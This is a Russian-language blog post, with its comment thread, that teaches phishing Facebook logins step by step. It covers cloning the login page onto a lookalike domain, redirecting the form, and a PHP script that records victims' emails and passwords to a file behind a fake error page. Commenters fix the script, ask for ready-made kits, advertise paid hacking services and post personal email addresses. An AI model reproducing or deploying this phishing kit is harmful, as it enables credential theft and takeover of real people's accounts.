среда, 23 мая 2012 г.

Как взломать Аккаунт в Facebook


Внимание!!! Весь следующий материал опубликован исключительно в УЧЕБНО-ПОЗНАВАТЕЛЬНЫХ целях и я не виноват, если кому то взбредёт в голову взламывать чужие страницы приведенным ниже способом. Перед прочтением данного материала я всем настоятельно рекомендую ознакомится со статьями 272 и 274 Уголовного Кодекса Российской Федерации.


Плюс ко всему ещё хочу сказать, что данная статья подойдет не всем, а только тем, кто имеет хоть какое-нибудь представление о сайтостроении и программировании на языке php.
Для начала немного теории. Существует множество способов взломать аккаунт в социальной сети: можно просидеть целую вечность подбирая пароли, можно бесконечно ебать програмный код социальной сети в поисках ошибок, можно связать владельца аккаунта и пытать его, пока не скажет пароль:) и т. д. В этой маленькой заметке я не собираюсь рассматривать их все, а расскажу только об одном способе - фишинге.
*Фишинг - это вид интернет мошенничества который подразумевает создание сайта внешне неотличимого от настоящего и после попадания пользователя на поддельную страницу мошенники всячески пытаются побудить пользователя ввести на ней свой логин и пароль, которые он использует для получения доступа к сайту и бессовестно крадут эти данные.
Да, такое бывает сплошь и рядом. Часто, в процессе работы в интернете, мы совершенно не замечаем, что и куда вводим и поэтому риск попадания на фишинговую страницу достаточно велик.
Теперь к делу. Сейчас я покажу, как можно создать фишинговую страницу и слямзить пароль и логин пользователя на примере социальной сети Facebook.

Шаг 1.
Сначала нам понадобится сервер с поддержкой php, я бы посоветовал бесплатный хостинг www.Ayola.net. Зарегистрировавшись подаём заявку на создание страницы www.facebook.pz9.ru, хотя впрочем неважно как она будет называться. После этого к вам придёт сообщение на почту, что нужная страница будет создана в течении 15 минут.
Затем качаем FTP  клиент FileZilla, чтобы закидывать файлы на сервер. Это можно скачать здесь.


Шаг 2.


Заходим на страницу www.facebook.com, нажимаем в меню браузера Файл > Сохранить как и сохраняем страницу и все прилежащие папки на рабочем столе. Затем я рекомендую переименовать файл "Добро пожаловать на Фейсбук - заходите, регистрируйтесь и находите друзей.htm" в "index.htm".
После открываем с помощью блокнота этот файл и ищем там форму <form id="login_form">. Меняем у этой формы свойство method на "GET" и свойство action на "http:\\www.facebook.pz9.ru\write.php".
А дальше запомним , что в форме есть два текстовых поля, которые называютя email и password. (это нам впоследствии очень пригодится).

Шаг 3.


Теперь закрываем index.htm и создаём файл write.php, которыйзаполняем следующем php кодом:


<?php
$fp = fopen("hack.txt", "a"); // Открываем файл в режиме записи
$mytext = $_GET['email']; // Логин
$mytest = $_GET['password']; // Пароль
$test = fwrite($fp, $mytext); // Запись в файл логина
$test = fwrite($fp, $mytest); // Запись в файл пароля
fclose($fp); //Закрытие файла
echo ('Ошибка, запрашиваемая страница не найдена, пройдите по ссылке <a href="http://www.facebook.com">facebook</a>');
?>
*Здесь и далее под логином подразумевается адрес электронной почты.

Шаг 4.
Проверяем создалась ли наша страничка, если она уже создана, подключаемся к серверу с помощью FTP клиента (адрес сервера и данные для входа вам сообщит хостер при регистрации) и закидываем туда файл index.htm и все что было сохранено браузером в шаге 2 тоже. Затем создаём пустой текстовый файл, называем его hack.txt и тоже кидаем на сервер вместе с файлом write.php.

Шаг 5.
Ну вот собственно и всё, теперь нужно как-нибудь незаметно подкинуть ссылку www.facebook.pz9.ru нашей жертве, но как это сделать решайте  сами. Самое главное, что когда жертва введёт свои данные на этой странице, то эти логин и пароль окажутся в файле hack.txt, который лежит на нашем сервере.  И если повезёт, то она этого даже и не заметит!

Ну а теперь традиционное "Как это работает?". А работает это очень просто. Когда пользователь ввводит свои данные на фальшивой странице и нажимает кнопку "Войти", браузер сохраняет его логин и пароль в переменных email и password соответственно, а затем отправляет методом GET на сервер к нашему php скрипту в файле write.php, который записывает значения этих переменных в файл hack.txt и отправляет пользователю сообщение  "Ошибка, запрашиваемая страница не найдена, пройдите по ссылке www.facebook.com". Пользователь спокойно переходит по ссылке и наши злодеяния остаются незамеченными! И остаётся только с помощью FTP клиента скачать файл hack.txt и дело сделано!
Впринципе имея соответствующие знания о веб технологиях это можно реализовать меньше чем за 15 минут. И кроме того этот способ может быть применим абсолютно для любой социалки, нужен только мозг, и растущие из правильного места руки.
Однако если вы простой необразованный юзер, то вам с этим нигокда не справится. Сидите и подбирайте пароли.
На сегодня всё, пока...

42 коммент.:

  1. он только майл дал а пароля нет (

    ОтветитьУдалить
  2. да-да, выдает только имейл без пароля в hack.txt..может изменился чуть изначальный файл index’а и теперь в нем надо что-то по другому менять..но что и как не знаю, можете, кто-нибудь, пожалуйста, помочь с решением этого вопроса)

    ОтветитьУдалить
  3. Будучи чайником, чуть по лазил по файлу индекса и разобрался, все работает..только в коде PHP файла вам надо поменять слово "password" на "pass", наслаждайтесь)

    ОтветитьУдалить
  4. usluga vzloma... zaregestriruites v site ;)
    cena xoroshaya

    http://SuperVzlom.com/?inv145718

    ОтветитьУдалить
  5. Ребят сделал всё но не выдаёт не хрена сайт получился я сам чайник ели ели разобрался помогите я не как с этим index ом не разберусь можете по шагово объяснить что там заменять

    ОтветитьУдалить
  6. Давай мыло, я тебе кину туда готовый индекс и пхп, только адрес сайта назови свой, чтобы я его в индекс впихнул

    ОтветитьУдалить
  7. Этот комментарий был удален автором.

    ОтветитьУдалить
  8. http://facebooksb.pz9.ru/ это сайт ) вот мыло fiko134@mail.ru Спасибо )

    ОтветитьУдалить
  9. Скиньте мне тоже пожалуйста готовый индекс и пхп
    anton-1995@inbox.ru

    ОтветитьУдалить
  10. Этот комментарий был удален автором.

    ОтветитьУдалить
  11. Антон Сазонов12 марта 2013 г., 12:25
    Скиньте мне тоже пожалуйста готовый индекс и пхп
    anton-1995@inbox.ru

    для этого тебе как минимум надо кинуть название своего сайта подставного, чтобы можно было его вставить в индекс

    ОтветитьУдалить
    Ответы
    1. Скиньте и мне пожалуйста.
      facebook.mailboxserv.com

      garvard@gmail.com

      Спасибо.

      Удалить
  12. очень-очень долго возился с индексом для контакта, делал все что только можно и нельзя, но результата нет(( просто все, что я делаю, это считай первый раз, просто дружу довольно с техникой и зачастую все выходит..а так познаний в PHP и скриптах никаких нет..может есть кто знающий, кто поможет сделать то же самое с контактом))
    ayola.net его сразу блокирует, поэтому создавал на 1gb.ua сайт

    ОтветитьУдалить
  13. http://facebook.xe0.ru/ Я думаю этого будет достаточно?))

    ОтветитьУдалить
  14. народ подскажите плиз, сделал все как в описании, ничего на "hack" не приходит!????

    ОтветитьУдалить
  15. не получается у меня.чаиник я.если кто сможете мне помочь.нужен срочно узнать логин и пароль феисбука кто захочет помочь пишите на мыло stefan.s82@mail.ru спасибо заранее

    ОтветитьУдалить
  16. создал страницу http://pulsuzface.pz9.ru/ , установил FZ. открыл страницу через ZF.. сделал там всё так как ты сказал... зохожу на сайт а он ошибку даёт... хотя до вставки файлов было написано что сайт создан... вот моё мыло... umud_inf13@bk.ru а сайт написан выше... пришли пожалуйста всё что нужно... буду очень благодарен

    ОтветитьУдалить
  17. zrasvstvuye prowu pomoqite mne nujno vzlomat akkaunt

    ОтветитьУдалить
  18. http://fasebook.zg5.ru /// blackzero97@gmail.com

    plz skin na eto milp

    ОтветитьУдалить
  19. парни Хелп!) я не фига не шарю в этом ... просто проблема в том что я Админ Странички в ФБ ... Официальной ... https://www.facebook.com/AzerbajdzanskaaRespublikanskaaLigaKvnVozrozdenie ...

    ее взломали и лишили меня прав доступа к ней... мне надо ее вернуть... как быть что делать ... знаю профиль взломщика...

    ОтветитьУдалить
  20. Автор тупой юзер, так как взламывать таких же тупых как ты неинтересно, а знающие люди не за что не введут свои данные перейдя по ссылке.

    ОтветитьУдалить
  21. все сделала, как написано, но не работает сама страница-ловушка
    сделанный сайт http://facebookps7.pz9.ru/
    почта annkuz93@gmail.com
    помогите ^^

    ОтветитьУдалить
  22. Этот комментарий был удален автором.

    ОтветитьУдалить
  23. Скиньте мне тоже пожалуйста готовый индекс и пхп bapxammepp@gmail.com
    http://bapxamma.pz9.ru/

    ОтветитьУдалить
  24. Могу помочь взломать!Смотрите мой фейк фейсбука http://faceb0o0k.96.lt
    И не только фейсбук!постучите скайп:agja55
    Не дорого

    ОтветитьУдалить
  25. Скиньте мне тоже пожалуйста готовый индекс и PHP адрес сайта http://fasebookerss.hol.es email: ayos@inbox.ru

    ОтветитьУдалить
  26. dobrii vecer ya ne ponemayu php no echeni bi hotelos toje po probivati ...pomoghite ktonibuti ...... zaranye sposibo
    mail : sorinburlacu967@gmail.com
    http://facebook1ver.pz9.ru/

    ОтветитьУдалить
  27. Этот комментарий был удален автором.

    ОтветитьУдалить
  28. Критическая ошибка при закачке файлов на сервер . Что я делаю не так ?

    ОтветитьУдалить
  29. Помогите пожалуйста Skype : lachikman

    ОтветитьУдалить
  30. админ. Я хочу помочь вам.
    Я не знаю, что-то об этом.
    пожалуйста, помогите мне получить мою Facebook обратно.
    если готовы помочь. отправьте сообщение на мой Google. спасибо

    ОтветитьУдалить
  31. Всем доброго утречка!!!
    Нужна срочная помощь, сменить админа на фэйсбуке, чел больше не работает и пишет гадости. пишите 000745@mail.ru

    ОтветитьУдалить
  32. Скиньте мне тоже пожалуйста готовый индекс и PHP адрес сайта http://facebook4fun.zabix.net/ email: hdgamer0607@gmail.com

    ОтветитьУдалить
  33. Скиньте мне тоже пожалуйста готовый индекс и пхп
    garvard@gmail.com
    http://facebook.mailboxserv.com

    Спасибо

    ОтветитьУдалить
  34. создал страницу http://pulsuzface.pz9.ru/ , установил FZ. открыл страницу через ZF.. сделал там всё так как ты сказал... зохожу на сайт а он ошибку даёт

    ОтветитьУдалить
  35. Помоги пожалуйста,вот мой Mail alex-brinza@mail.ru или grymreaper1992@gmail.com

    ОтветитьУдалить